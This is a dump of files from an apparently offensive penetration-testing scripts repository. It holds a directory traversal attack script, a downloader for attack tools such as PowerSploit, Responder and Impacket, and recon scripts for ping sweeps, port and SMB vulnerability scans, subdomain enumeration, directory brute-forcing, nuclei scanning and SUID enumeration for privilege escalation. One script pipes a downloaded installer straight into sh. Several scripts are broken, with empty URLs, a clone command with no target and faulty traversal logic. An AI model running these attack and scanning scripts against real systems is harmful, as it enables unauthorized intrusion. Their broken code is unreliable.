It displays progress messages and only prints valid 6 | URLs that return a 200 OK response. 7 | """ 8 | 9 | import requests 10 | import validators 11 | import re 12 | 13 | # Prompt the user for the target URL 14 | while True: 15 | url = input("Please enter the target URL: ") 16 | if validators.url(url): 17 | break 18 | else: 19 | print("Invalid URL. Please try again.") 20 | 21 | # Prompt the user for the number of traversal levels 22 | while True: 23 | num_levels = input("Please enter the number of traversal levels (default: 20): ") 24 | if num_levels == "": 25 | num_levels = 20 26 | break 27 | elif num_levels.isnumeric(): 28 | num_levels = int(num_levels) 29 | break 30 | else: 31 | print("Invalid input. Please enter a numeric value or leave blank for default.") 32 | 33 | # Perform the directory traversal attack 34 | response = requests.get(url) 35 | 36 | file_paths = re.findall('"((?:\\.|[^"\\])*)"', response.text) 37 | 38 | num_valid_urls = 0 39 | 40 | for path in file_paths: 41 | if "=" in path: 42 | for i in range(num_levels): 43 | url = url + "../" 44 | url += path 45 | try: 46 | response = requests.get(url) 47 | if response.status_code == 200: 48 | print(url) 49 | num_valid_urls += 1 50 | else: 51 | break 52 | except requests.exceptions.RequestException as e: 53 | print("An error occurred:", e) 54 | break 55 | 56 | # Display a summary of the results 57 | print(f"Directory traversal attack complete. 
Found {num_valid_urls} valid URLs.") 58 | -------------------------------------------------------------------------------- /scripts/foothold-to-escalation/winTools.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | set -euo pipefail 3 | 4 | TARGET_DIR="tools" 5 | mkdir -p "$TARGET_DIR" 6 | cd "$TARGET_DIR" || exit 1 7 | 8 | declare -A repos=( 9 | ["ScriptSentry"]="https://github.com/techspence/ScriptSentry" 10 | ["PingCastle"]="https://github.com/vletoux/pingcastle" 11 | ["Locksmith"]="https://github.com/jakehildreth/Locksmith" 12 | ["PowerSploit"]="https://github.com/PowerShellMafia/PowerSploit" 13 | ["PowerSharpPack"]="https://github.com/S3cur3Th1sSh1t/PowerSharpPack" 14 | ["PrivescCheck"]="https://github.com/itm4n/PrivescCheck" 15 | ["ADACLScanner"]="https://github.com/canix1/ADACLScanner" 16 | ["Certipy"]="https://github.com/ly4k/Certipy" 17 | ["Responder"]="https://github.com/SpiderLabs/Responder" 18 | ["Impacket"]="https://github.com/SecureAuthCorp/impacket" 19 | ["Kerbrute"]="https://github.com/ropnop/kerbrute" 20 | ["Maester"]="https://github.com/maester365/maester" 21 | ["ADMiner"]="https://github.com/dirkjanm/adidnsdump" 22 | ["CrackMapExec"]="https://github.com/byt3bl33d3r/CrackMapExec" 23 | ["ROADtools"]="https://github.com/dirkjanm/ROADtools" 24 | ["BloodHound"]="https://github.com/BloodHoundAD/BloodHound" 25 | ) 26 | 27 | declare -A cloned 28 | 29 | echo "--- Cloning GitHub Repositories ---" 30 | for tool in "${!repos[@]}"; do 31 | repo_url=${repos[$tool]} 32 | target_name="$tool" 33 | 34 | if [ -e "$target_name" ]; then 35 | echo "[$target_name] exists, skipping." 36 | continue 37 | fi 38 | 39 | if [[ -n "${cloned[$repo_url]:-}" ]]; then 40 | existing_tool_dir=${cloned[$repo_url]} 41 | echo "[$target_name] uses same repo as [$existing_tool_dir], linking." 
42 | if [ -d "$existing_tool_dir" ]; then 43 | ln -s "$existing_tool_dir" "$target_name" 44 | else 45 | echo "Warning: Source [$existing_tool_dir] not found. Skipping link for [$target_name]." 46 | fi 47 | else 48 | echo "Cloning [$target_name] from $repo_url" 49 | if git clone --depth 1 "$repo_url" "$target_name"; then 50 | cloned["$repo_url"]="$target_name" 51 | else 52 | echo "Error cloning [$target_name]. Skipping." 53 | rm -rf "$target_name" 54 | fi 55 | fi 56 | done 57 | echo "--- Finished Cloning ---" 58 | 59 | echo "--- Handling PowerView Symlink ---" 60 | POWERSPLOIT_DIR="PowerSploit" 61 | POWERVIEW_DIR="PowerView" 62 | POWERVIEW_SUBDIR="Recon" 63 | if [ -d "$POWERSPLOIT_DIR" ] && [ ! -e "$POWERVIEW_DIR" ]; then 64 | if [ -d "$POWERSPLOIT_DIR/$POWERVIEW_SUBDIR" ]; then 65 | echo "Creating symlink for [PowerView]" 66 | ln -s "$POWERSPLOIT_DIR/$POWERVIEW_SUBDIR" "$POWERVIEW_DIR" 67 | else 68 | echo "Warning: [$POWERSPLOIT_DIR/$POWERVIEW_SUBDIR] not found. Cannot link PowerView." 69 | fi 70 | elif [ -e "$POWERVIEW_DIR" ]; then 71 | echo "[PowerView] exists, skipping link." 72 | elif [ ! -d "$POWERSPLOIT_DIR" ]; then 73 | echo "Warning: [$POWERSPLOIT_DIR] not found. Cannot link PowerView." 74 | fi 75 | 76 | echo "--- Handling ADExplorer Download ---" 77 | ADEXPLORER_DIR="ADExplorer" 78 | if [ ! -d "$ADEXPLORER_DIR" ]; then 79 | echo "Downloading ADExplorer" 80 | mkdir "$ADEXPLORER_DIR" 81 | if curl -L -o "$ADEXPLORER_DIR/ADExplorer.zip" "https://download.sysinternals.com/files/ADExplorer.zip"; then 82 | echo "ADExplorer downloaded." 83 | else 84 | echo "Error downloading ADExplorer." 85 | rm -rf "$ADEXPLORER_DIR" 86 | fi 87 | else 88 | echo "[ADExplorer] exists, skipping download." 89 | fi 90 | 91 | echo "--- Handling TSS Tools Download ---" 92 | TSS_DIR="TSS" 93 | if [ ! -d "$TSS_DIR" ]; then 94 | echo "Downloading TSS Tools" 95 | mkdir "$TSS_DIR" 96 | if curl -L -o "$TSS_DIR/TSS.zip" "https://aka.ms/getTSS"; then 97 | echo "TSS Tools downloaded." 
98 | else 99 | echo "Error downloading TSS Tools." 100 | rm -rf "$TSS_DIR" 101 | fi 102 | else 103 | echo "[TSS] exists, skipping download." 104 | fi 105 | 106 | echo "" 107 | echo "Tool download process finished into '$TARGET_DIR' directory." 108 | -------------------------------------------------------------------------------- /scripts/recon/ipsweep.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Loop the subnet, list connected hosts. 3 | #Take arg 1 as input to scan 4 | 5 | if [ "$1" == "" ] 6 | then 7 | echo "You forgot an IP address" 8 | echo "Syntax: ./ipsweep.sh 192.168.10" 9 | 10 | else 11 | for ip in `seq 1 254`; do 12 | ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" & 13 | done 14 | fi 15 | -------------------------------------------------------------------------------- /scripts/recon/maxrecon.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #This is a comprehensive reconnaissance script that chains together various tools to perform reconnaissance on a given domain. It performs subdomain enumeration, port scanning, directory brute-forcing, parameter fuzzing, and vulnerability scanning. Note that some tools require additional installations. 3 | 4 | 5 | # Take a domain as an argument 6 | if [ -z $1 ]; then 7 | echo "Usage: $0 domain.com" 8 | exit 1 9 | fi 10 | 11 | # Install necessary tools 12 | sudo apt-get update 13 | sudo apt-get install -y jq nmap 14 | 15 | if ! command -v go &> /dev/null 16 | then 17 | echo "Go is not installed. Installing..." 18 | sudo apt-get install -y golang-go 19 | else 20 | echo "Go is already installed." 21 | fi 22 | 23 | if ! command -v git &> /dev/null 24 | then 25 | echo "Git is not installed. Installing..." 26 | sudo apt-get install -y git 27 | else 28 | echo "Git is already installed." 29 | fi 30 | 31 | if ! command -v cargo &> /dev/null 32 | then 33 | echo "Cargo is not installed. 
Installing..." 34 | curl -sSf | sh -s -- -y 35 | export PATH=$HOME/.cargo/bin:$PATH 36 | else 37 | echo "Cargo is already installed." 38 | fi 39 | 40 | if ! command -v assetfinder &> /dev/null 41 | then 42 | echo "assetfinder is not installed. Installing..." 43 | go get -u github.com/tomnomnom/assetfinder 44 | else 45 | echo "assetfinder is already installed." 46 | fi 47 | 48 | if ! command -v amass &> /dev/null 49 | then 50 | echo "amass is not installed. Installing..." 51 | go get -u github.com/OWASP/Amass/v3/... 52 | else 53 | echo "amass is already installed." 54 | fi 55 | 56 | if ! command -v subfinder &> /dev/null 57 | then 58 | echo "subfinder is not installed. Installing..." 59 | go get -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder 60 | else 61 | echo "subfinder is already installed." 62 | fi 63 | 64 | if ! command -v findomain &> /dev/null 65 | then 66 | echo "findomain is not installed. Installing..." 67 | git clone 68 | cd Findomain 69 | cargo build --release 70 | sudo cp target/release/findomain /usr/bin/ 71 | cd .. 72 | else 73 | echo "findomain is already installed." 74 | fi 75 | 76 | if ! command -v httprobe &> /dev/null 77 | then 78 | echo "httprobe is not installed. Installing..." 79 | go get -u github.com/tomnomnom/httprobe 80 | else 81 | echo "httprobe is already installed." 82 | fi 83 | 84 | if ! command -v ffuf &> /dev/null 85 | then 86 | echo "ffuf is not installed. Installing..." 87 | go get -u github.com/ffuf/ffuf 88 | else 89 | echo "ffuf is already installed." 90 | fi 91 | 92 | if ! command -v gau &> /dev/null 93 | then 94 | echo "gau is not installed. Installing..." 95 | go get -u github.com/lc/gau 96 | else 97 | echo "gau is already installed." 98 | fi 99 | 100 | if ! command -v qsreplace &> /dev/null 101 | then 102 | echo "qsreplace is not installed. Installing..." 103 | go get -u github.com/tomnomnom/qsreplace 104 | else 105 | echo "qsreplace is already installed." 106 | fi 107 | 108 | if ! 
command -v nuclei &> /dev/null 109 | then 110 | echo "nuclei is not installed. Installing..." 111 | GO111MODULE=on go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei 112 | else 113 | echo "nuclei is already installed." 114 | fi 115 | 116 | # Create directories for output 117 | if [ ! -d "$1" ]; then 118 | mkdir $1 119 | fi 120 | if [ ! -d "$1/recon" ]; then 121 | mkdir $1/recon 122 | fi 123 | 124 | # Subdomain enumeration 125 | echo "[+] Starting subdomain enumeration..." 126 | assetfinder $1 | sort -u | httprobe -s -p https:443 | sed 's/https\\\\?:\\\\/\\\\///' | tr -d ': 443' >> $1/recon/alive.txt 127 | amass intel -d $1 -whois -active -o $1/recon/amass.txt 128 | cat $1/recon/amass.txt | awk '{print $2}' | sort -u | httprobe -s -p https:443 | sed 's/https\\\\?:\\\\/\\\\///' | tr -d ': 443' >> $1/recon/alive.txt 129 | subfinder -d $1 -o $1/recon/subfinder.txt 130 | cat $1/recon/subfinder.txt | sort -u | httprobe -s -p https:443 | sed 's/https\\\\?:\\\\/\\\\///' | tr -d ': 443' >> $1/recon/alive.txt 131 | findomain -t $1 -u $1/recon/findomain.txt 132 | cat $1/recon/findomain.txt | sort -u | httprobe -s -p https:443 | sed 's/https\\\\?:\\\\/\\\\///' | tr -d ': 443' >> $1/recon/alive.txt 133 | curl -s "" | jq -r '.[].name_value' | sed 's/\\\\*\\\\.//g' | sort -u | httprobe -s -p https:443 | sed 's/https\\\\?:\\\\/\\\\///' | tr -d ': 443' >> $1/recon/alive.txt 134 | cat $1/recon/alive.txt | sort -u >> $1/recon/final.txt 135 | 136 | # Port scanning 137 | echo "[+] Starting port scanning..." 138 | nmap -sS -T4 -p- -oA $1/recon/nmap $1 139 | cat $1/recon/nmap.nmap | grep 'open' | awk '{print $1}' | tr -d 'Nmap' | tr -d '()' | tr -d '/' | sort -u | awk '{print "https://"$1}' >> $1/recon/alive.txt 140 | cat $1/recon/alive.txt | sort -u >> $1/recon/final.txt 141 | 142 | # Directory brute-forcing 143 | echo "[+] Starting directory brute-forcing..." 
144 | ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u -mc 200 -t 100 -o $1/recon/ffuf.txt 145 | ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u -mc 200 -t 100 -o $1/recon/ffuf_params.txt 146 | 147 | # Parameter fuzzing 148 | echo "[+] Starting parameter fuzzing..." 149 | gau $1 | grep -E "\\\\.php|\\\\.aspx|\\\\.jsp|\\\\.json" | qsreplace VALUE | while read url; do ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $url -mc 200 -t 100 -o $1/recon/ffuf_params.txt ; done 150 | 151 | # Vulnerability scanning 152 | echo "[+] Starting vulnerability scanning..." 153 | nuclei -l $1/recon/final.txt -t cves/ -t default-logins/ -t exposed-panels/ -t exposures/ -t files/ -t generic-detections/ -t misconfigurations/ -t takeovers/ -t technologies/ -t tokens/ -t workflows/ -t vulnerabilities/ 154 | 155 | -------------------------------------------------------------------------------- /scripts/recon/nmap-dir-vuln.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Set the target URL 4 | url="https://example.com" 5 | 6 | # Set the output file 7 | output_file="recon_results.txt" 8 | 9 | # Perform subdomain enumeration 10 | echo "Performing subdomain enumeration..." 11 | subdomains=$(subfinder -d $url) 12 | echo $subdomains >> $output_file 13 | 14 | # Perform directory and file discovery 15 | echo "Performing directory and file discovery..." 16 | dirsearch -u $url -e * >> $output_file 17 | 18 | # Check for open ports and running services 19 | echo "Performing port scan..." 20 | nmap -sC -sV $url >> $output_file & wait 21 | 22 | # Check for known vulnerabilities 23 | echo "Checking for known vulnerabilities..." 24 | vulners -s $url >> $output_file 25 | 26 | echo "Recon complete!" 
27 | -------------------------------------------------------------------------------- /scripts/recon/oneLineSubs.md: -------------------------------------------------------------------------------- 1 | ` 2 | subfinder -d example.com -silent | assetfinder --subs-only | httprobe -c 50 | tee temp_urls.txt | { while read url; do echo $url | waybackurls; echo $url | hakrawler; done } | sort -u > output.txt && rm temp_urls.txt 3 | ` 4 | -------------------------------------------------------------------------------- /scripts/recon/port-report.py: -------------------------------------------------------------------------------- 1 | #!/bin/python3 2 | 3 | import sys 4 | import socket 5 | from datetime import datetime 6 | import argparse 7 | from threading import Thread 8 | import time 9 | import random 10 | 11 | # Define command-line arguments 12 | parser = argparse.ArgumentParser() 13 | parser.add_argument("ip", help="IP address of the target host") 14 | parser.add_argument("-p", "--ports", help="Port range to scan (default: 1-1000)") 15 | args = parser.parse_args() 16 | 17 | # Define target IP and port range 18 | target = args.ip 19 | if args.ports: 20 | start_port, end_port = map(int, args.ports.split("-")) 21 | else: 22 | start_port, end_port = 1, 1000 23 | 24 | # Add a banner 25 | print("-" * 50) 26 | print("[*] Scanning Target...") 27 | print("[*] Time Started: "+str(datetime.now())) 28 | print("[*] Target IP: {}".format(target)) 29 | print("[*] Port range: {}-{}".format(start_port, end_port)) 30 | print("-" * 50) 31 | 32 | # Create output file 33 | file = open("scan_results.txt", "w") 34 | file.write("Scan Results for: " + target + "\n") 35 | file.write("Time Started: " + str(datetime.now()) + "\n") 36 | 37 | # Randomize the order in which ports are scanned 38 | ports = random.sample(range(start_port, end_port+1), end_port-start_port+1) 39 | 40 | # Check for open ports on a router like dns 41 | def scan(port): 42 | try: 43 | s = socket.socket(socket.AF_INET, 
socket.SOCK_STREAM) 44 | s.settimeout(1) 45 | result = s.connect_ex((target, port)) 46 | if result == 0: 47 | print(f"Port {port} is open") 48 | file.write(f"Port {port} is open\n") 49 | s.close() 50 | except Exception as e: 51 | print(f"Error: {e}") 52 | 53 | # Use threading to speed up the scanning process 54 | threads = [] 55 | for port in ports: 56 | t = Thread(target=scan, args=(port,)) 57 | threads.append(t) 58 | t.start() 59 | time.sleep(0.1) # add delay between each connection attempt 60 | 61 | # Wait for all threads to complete 62 | for t in threads: 63 | t.join() 64 | 65 | # Add footer to output file 66 | file.write("\nTime Completed: " + str(datetime.now())) 67 | file.close() 68 | -------------------------------------------------------------------------------- /scripts/recon/portscanner.py: -------------------------------------------------------------------------------- 1 | #!/bin/python3 2 | 3 | import sys 4 | import socket 5 | from datetime import datetime 6 | 7 | #Define target 8 | if len(sys.argv) == 2: 9 | target = socket.gethostbyname(sys.argv[1]) # translate to ipv4 10 | else: 11 | print("Invalid amount of args") 12 | print("Syntax: python scanner.py ") 13 | 14 | #Add a banner 15 | print("-" * 50) 16 | print("[*] Scanning Target...") 17 | print("[*] Time Started: "+str(datetime.now())) 18 | print("-" * 50) 19 | 20 | #check for open ports on a router like dns 21 | try: 22 | for port in range(1,500): 23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | socket.setdefaulttimeout(1) 25 | result = s.connect_ex((target,port)) 26 | if result == 0: 27 | print(f"Port {port} is open") 28 | s.close() 29 | 30 | except KeyboardInterrupt: 31 | print("\nExiting Program") 32 | sys.exit() 33 | 34 | except socket.gaierror: 35 | print("Hostname could not be resolved") 36 | sys.exit() 37 | 38 | except socket.error: 39 | print("Could not connect to server.") 40 | sys.exit() 41 | 42 | 
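# -------------------------------------------------------------------------------- /scripts/recon/smb-scan.sh: --------------------------------------------------------------------------------
#!/bin/bash

# Script to check the local host/segment for SSH sessions, open SMB ports,
# reachable SMB shares and nmap's smb-vuln* findings. Everything is echoed
# and appended to scan_<timestamp>.txt in the current directory.
# (The original header said "signs of hacking and malware"; nothing below
# looks for malware.)

# Get interface: the one carrying the default route. The original took the
# first entry of `ip addr show`, which is normally `lo` (no broadcast address),
# so broadcast_ip ended up empty and the SMB checks had no target.
interface=$(ip route show default 2>/dev/null | awk '{for (i = 1; i <= NF; i++) if ($i == "dev") {print $(i+1); exit}}')
if [ -z "$interface" ]; then
    echo "No default route found; cannot pick an interface." >&2
    exit 1
fi

# Get local broadcast IP (ifconfig comes from net-tools and is missing on many
# current distributions; `ip -o -f inet addr show "$interface"` is the
# iproute2 equivalent).
broadcast_ip=$(ifconfig "$interface" | grep -E 'inet[^6]' | grep -oE 'broadcast [0-9.]+' | awk '{print $2}')
if [ -z "$broadcast_ip" ]; then
    echo "Could not determine the broadcast address of $interface." >&2
    exit 1
fi

# Create a log file with a timestamp
log_file="scan_$(date +%Y-%m-%d_%H-%M-%S).txt"
touch "$log_file"

# Check for unauthorized SSH access
echo "Checking for unauthorized SSH access..." | tee -a "$log_file"
ssh_connections=$(lsof -i :22)
# NOTE(review): "authorized_user" is a placeholder -- replace it with the
# accounts that legitimately hold SSH sessions, or every non-root session is
# reported. The lsof header line is dropped so it is not reported as a session.
unauthorized_connections=$(echo "$ssh_connections" | grep -v '^COMMAND' | grep -v "root" | grep -v "authorized_user")

if [ -n "$unauthorized_connections" ]; then
    echo "Unauthorized SSH connections detected:" | tee -a "$log_file"
    echo "$unauthorized_connections" | tee -a "$log_file"
else
    echo "No unauthorized SSH connections detected." | tee -a "$log_file"
fi

# Check for open SMB ports on this host (netstat is net-tools; `ss -an` is the modern equivalent)
echo "Checking for open SMB ports..." | tee -a "$log_file"
open_ports=$(netstat -an | grep ":445\|:139")

if [ -n "$open_ports" ]; then
    echo "Open SMB ports detected:" | tee -a "$log_file"
    echo "$open_ports" | tee -a "$log_file"
else
    echo "No open SMB ports detected." | tee -a "$log_file"
fi

#Check for SMB shares
# NOTE(review): a broadcast address is not a unicast SMB endpoint, so smbclient
# (and the nmap run below) will usually see nothing here; listing shares needs
# individual hosts, e.g. the addresses nmap finds with 445 open on the
# interface's subnet. -N skips the interactive password prompt that would
# otherwise stall an unattended run.
echo "Checking for SMB shares..." | tee -a "$log_file"
smb_shares=$(smbclient -N -L "$broadcast_ip" 2>&1)

if [ -n "$smb_shares" ]; then
    echo "SMB shares detected:" | tee -a "$log_file"
    echo "$smb_shares" | tee -a "$log_file"
else
    echo "No SMB shares detected." | tee -a "$log_file"
fi

# Check for SMB vulnerabilities
echo "Checking for SMB vulnerabilities..." | tee -a "$log_file"
# The script pattern is quoted so the shell cannot expand smb-vuln* against
# files in the current directory before nmap sees it.
smb_vulnerabilities=$(nmap --script 'smb-vuln*' -p 445 "$broadcast_ip")

if [ -n "$smb_vulnerabilities" ]; then
    echo "SMB vulnerabilities detected:" | tee -a "$log_file"
    echo "$smb_vulnerabilities" | tee -a "$log_file"
else
    echo "No SMB vulnerabilities detected." | tee -a "$log_file"
fi

echo "Scan complete. Results saved in $log_file" | tee -a "$log_file"
# -------------------------------------------------------------------------------- /scripts/recon/subrecon.sh: --------------------------------------------------------------------------------
#!/bin/bash
# subdomain recon script
# Usage: ./subrecon.sh domain.com
#
# Pipeline: subfinder -> alterx -> altdns -> assetfinder/hakcheckurl -> amass,
# then gobuster against every surviving host. Intermediate files are created
# in the current directory and removed at the end; words.txt must exist there.

# Declare your target domain
domain=$1

# Check if domain is passed as an argument
if [ -z "$domain" ]
then
    echo "Usage: ./subdomain_recon.sh domain.com"
    exit 1
fi

# Use subfinder to find subdomains
echo "[*] Running subfinder..."
subfinder -d "$domain" -silent > subdomains.txt

# Use alterx to generate permutations of these subdomains
echo "[*] Running alterx..."
alterx < subdomains.txt > altered_subdomains.txt

# Use altdns to generate additional permutations (flags kept as the author wrote them)
echo "[*] Running altdns..."
altdns -i altered_subdomains.txt -o data_output -w words.txt -r -S

# Use assetfinder and hakcheckurl to validate these subdomains
echo "[*] Running assetfinder and hakcheckurl..."
# NOTE(review): as far as I recall hakcheckurl prints a status code before each
# URL, which would leave "<status> <url>" lines in valid_subdomains.txt next to
# the bare hostnames amass appends below -- confirm the format; if so, strip
# the status column before the gobuster loop.
assetfinder -subs-only < data_output | hakcheckurl | grep -v 404 > valid_subdomains.txt

# Use Amass to gather additional intel
echo "[*] Running Amass..."
amass enum -passive -d "$domain" >> valid_subdomains.txt

# Use gobuster on the identified subdomains
echo "[*] Running Gobuster..."
# read -r instead of `for x in $(cat ...)` so each line is handled whole.
while read -r subdomain; do
    gobuster dir -u "$subdomain" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,php -o "$subdomain.txt"
done < valid_subdomains.txt

# Clean up
rm subdomains.txt altered_subdomains.txt data_output
# -------------------------------------------------------------------------------- /scripts/recon/system-filescan.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Host snapshot for a privilege-escalation review: SUID files, world-writable
# files, cron contents, /etc/issue, kernel, installed packages and login history,
# all appended to recon_report_<timestamp>.txt in the current directory.
# Assumes a Debian-family host (dpkg). find's permission errors are silenced
# (2>/dev/null), not reported, so a non-root run is silently incomplete.

# Create a log file with the current date and time
LOG_FILE="recon_report_$(date +%Y-%m-%d_%H-%M-%S).txt"

# Find all SUID files and redirect stderr to /dev/null
echo "### SUID files ###" >> "$LOG_FILE"
find / -perm -u=s -type f -exec file {} \; 2>/dev/null >> "$LOG_FILE"
echo "" >> "$LOG_FILE"

# Find all world-writable files and redirect stderr to /dev/null
echo "### World-writable files ###" >> "$LOG_FILE"
find / -perm -o+w -type f 2>/dev/null >> "$LOG_FILE"
echo "" >> "$LOG_FILE"

# List all files in /etc/cron* and its subdirectories
echo "### Files in /etc/cron* ###" >> "$LOG_FILE"
ls -laR /etc/cron* >> "$LOG_FILE"
echo "" >> "$LOG_FILE"

# Show contents of /etc/issue
echo "### /etc/issue contents ###" >> "$LOG_FILE"
cat /etc/issue >> "$LOG_FILE"
echo "" >> "$LOG_FILE"

# Show output of uname -a command
echo "### OS and Kernel ###" >> "$LOG_FILE"
uname -a >> "$LOG_FILE"
echo "" >> "$LOG_FILE"

# Show installed packages
echo "### Installed packages ###" >> "$LOG_FILE"
dpkg -l >> "$LOG_FILE"
echo "" >> "$LOG_FILE"

# Show last logged-in users using last
echo "### last users output ###" >> "$LOG_FILE"
last >> "$LOG_FILE"
echo "" >> "$LOG_FILE"
# -------------------------------------------------------------------------------- /scripts/recon/theEnumerator.sh: --------------------------------------------------------------------------------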
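#!/bin/bash
# Credit TheCyberMentor
#
# theEnumerator.sh DOMAIN -- builds DOMAIN/recon/ with: final.txt (subdomains),
# httprobe/alive.txt (hosts answering on 443), potential_takeovers/, scans/
# (nmap), wayback/ (archived URLs plus extracted params and files by extension).

url=$1
if [ -z "$url" ]; then
    echo "Usage: $0 domain.com" >&2
    exit 1
fi

# mkdir -p replaces the chain of "if [ ! -d ]; then mkdir" checks; it creates
# parents and is a no-op for directories that already exist.
mkdir -p "$url/recon" "$url/recon/scans" "$url/recon/httprobe" \
         "$url/recon/potential_takeovers" "$url/recon/wayback/params" \
         "$url/recon/wayback/extensions"
# if [ ! -d '$url/recon/eyewitness' ];then
# mkdir $url/recon/eyewitness
# fi
touch "$url/recon/httprobe/alive.txt" "$url/recon/final.txt"

echo "[+] Harvesting subdomains with assetfinder..."
assetfinder "$url" >> "$url/recon/assets.txt"
grep "$1" "$url/recon/assets.txt" >> "$url/recon/final.txt"
rm "$url/recon/assets.txt"

#echo "[+] Double checking for subdomains with amass..."
#amass enum -d $url >> $url/recon/f.txt
#sort -u $url/recon/f.txt >> $url/recon/final.txt
#rm $url/recon/f.txt

echo "[+] Probing for alive domains..."
# `tr -d ':443'` in the original deleted every ':', '4' and '3' character from
# the hostnames (host43.example.com became host.example.com); only the
# trailing port should be stripped.
sort -u "$url/recon/final.txt" | httprobe -s -p https:443 | sed 's/https\?:\/\///' | sed 's/:443$//' >> "$url/recon/httprobe/a.txt"
sort -u "$url/recon/httprobe/a.txt" > "$url/recon/httprobe/alive.txt"
rm "$url/recon/httprobe/a.txt"

echo "[+] Checking for possible subdomain takeover..."

touch "$url/recon/potential_takeovers/potential_takeovers.txt"

# NOTE(review): the fingerprint path is hard-coded to an old GOPATH layout;
# point -c at wherever your subjack fingerprints file actually lives.
subjack -w "$url/recon/final.txt" -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.go -v 3 -o "$url/recon/potential_takeovers/potential_takeovers.txt"

echo "[+] Scanning for open ports..."
# -oA writes scanned.txt.nmap/.gnmap/.xml (the ".txt" is part of the basename).
nmap -iL "$url/recon/httprobe/alive.txt" -T4 -oA "$url/recon/scans/scanned.txt"

echo "[+] Scraping wayback data..."
waybackurls < "$url/recon/final.txt" >> "$url/recon/wayback/wayback_output.txt"
# The original ran `sort -u FILE` and discarded the output; -o dedups in place.
sort -u -o "$url/recon/wayback/wayback_output.txt" "$url/recon/wayback/wayback_output.txt"

echo "[+] Pulling and compiling all possible params found in wayback data..."
grep '?*=' "$url/recon/wayback/wayback_output.txt" | cut -d '=' -f 1 | sort -u >> "$url/recon/wayback/params/wayback_params.txt"
while read -r line; do echo "$line="; done < "$url/recon/wayback/params/wayback_params.txt"

echo "[+] Pulling and compiling js/php/aspx/jsp/json files from wayback output..."
# URLs are bucketed into <ext>1.txt first and deduplicated once at the end; the
# original re-sorted and re-appended the whole bucket on every iteration, so
# the final lists held each URL many times over.
# NOTE(review): ".html" URLs are collected into jsp1.txt/jsp.txt and there is
# no ".jsp" case -- kept as-is to preserve the output file names.
while read -r line; do
    ext="${line##*.}"
    case "$ext" in
        js)   echo "$line" >> "$url/recon/wayback/extensions/js1.txt" ;;
        html) echo "$line" >> "$url/recon/wayback/extensions/jsp1.txt" ;;
        json) echo "$line" >> "$url/recon/wayback/extensions/json1.txt" ;;
        php)  echo "$line" >> "$url/recon/wayback/extensions/php1.txt" ;;
        aspx) echo "$line" >> "$url/recon/wayback/extensions/aspx1.txt" ;;
    esac
done < "$url/recon/wayback/wayback_output.txt"

for name in js jsp json php aspx; do
    bucket="$url/recon/wayback/extensions/${name}1.txt"
    # A bucket only exists if at least one URL had that extension; the
    # original's unconditional rm printed errors for the missing ones.
    if [ -f "$bucket" ]; then
        sort -u "$bucket" >> "$url/recon/wayback/extensions/$name.txt"
        rm "$bucket"
    fi
done
#echo "[+] Running eyewitness against all compiled domains..."
#python3 EyeWitness/EyeWitness.py --web -f $url/recon/httprobe/alive.txt -d $url/recon/eyewitness --resolve
# -------------------------------------------------------------------------------- /scripts/recon/tool-heavy.sh: --------------------------------------------------------------------------------
#!/bin/bash
# tool-heavy.sh -- runs a long chain of recon tools against one URL and
# appends all output to recon_results.txt.
#
# NOTE(review): this reads like a skeleton rather than a tested script: most
# names in $tools are not Debian package names (the apt-get loop will report
# "installation failed" for them), several tools are handed the full https://
# URL where they expect a bare domain (subfinder, nmap), and $subdomains is
# built by string concatenation with no separator. Treat each step as a
# placeholder for the real invocation.

# Set the target URL
url="https://example.com"

# Set the output file
output_file="recon_results.txt"

# List of tools to be installed
tools=("subfinder" "Sublist3r" "MassDNS" "dirsearch" "nmap" "vulners" "GetJS" "GoLinkFinder" "getallurls" "WayBackUrls" "WayBackRobots" "FFuF" "XSSHunter" "SQLMap" "XXEInjector" "SSRFDetector" "GitTools" "gitallsecrets" "RaceTheWeb" "CORStest" "EyeWitness" "parameth")

# Install the tools
echo "Installing tools..."
for tool in "${tools[@]}"
do
    apt-get install "$tool" &> /dev/null && echo "$tool installed" || echo "$tool installation failed"
done

# Perform subdomain enumeration
echo "Performing subdomain enumeration..."
subdomains=$(subfinder -d "$url")
subdomains+=$(Sublist3r -d "$url")
subdomains+=$(MassDNS -d "$url")
# Quoted so the newlines between results survive into the file.
echo "$subdomains" >> "$output_file"

# Perform directory and file discovery
echo "Performing directory and file discovery..."
# '*' is quoted so the shell does not expand it to the files in the current directory.
dirsearch -u "$url" -e '*' >> "$output_file"

# Check for open ports and running services
echo "Performing port scan..."
nmap -sC -sV "$url" >> "$output_file"

# Check for known vulnerabilities
echo "Checking for known vulnerabilities..."
vulners -s "$url" >> "$output_file"

# Retrieve JavaScript files
echo "Retrieving JavaScript files..."
GetJS -u "$url" >> "$output_file"

# Find links
echo "Finding links..."
GoLinkFinder -u "$url" >> "$output_file"

# Get all URLs
echo "Retrieving all URLs..."
getallurls -u "$url" >> "$output_file"

# Check for URLs in Wayback Machine
echo "Checking for URLs in Wayback Machine..."
WayBackUrls -u "$url" >> "$output_file"

# Check for robots.txt in Wayback Machine
echo "Checking for robots.txt in Wayback Machine..."
WayBackRobots -u "$url" >> "$output_file"

# Check for Forced Browsing vulnerabilities
echo "Checking for Forced Browsing vulnerabilities..."
FFuF -u "$url" >> "$output_file"

# Check for XSS vulnerabilities
echo "Checking for XSS vulnerabilities..."
XSSHunter -u "$url" >> "$output_file"

# Check for SQL injection vulnerabilities
echo "Checking for SQL injection vulnerabilities..."
SQLMap -u "$url" >> "$output_file"

# Check for XXE vulnerabilities
echo "Checking for XXE vulnerabilities..."
XXEInjector -u "$url" >> "$output_file"

# Check for SSRF vulnerabilities
echo "Checking for SSRF vulnerabilities..."
SSRFDetector -u "$url" >> "$output_file"

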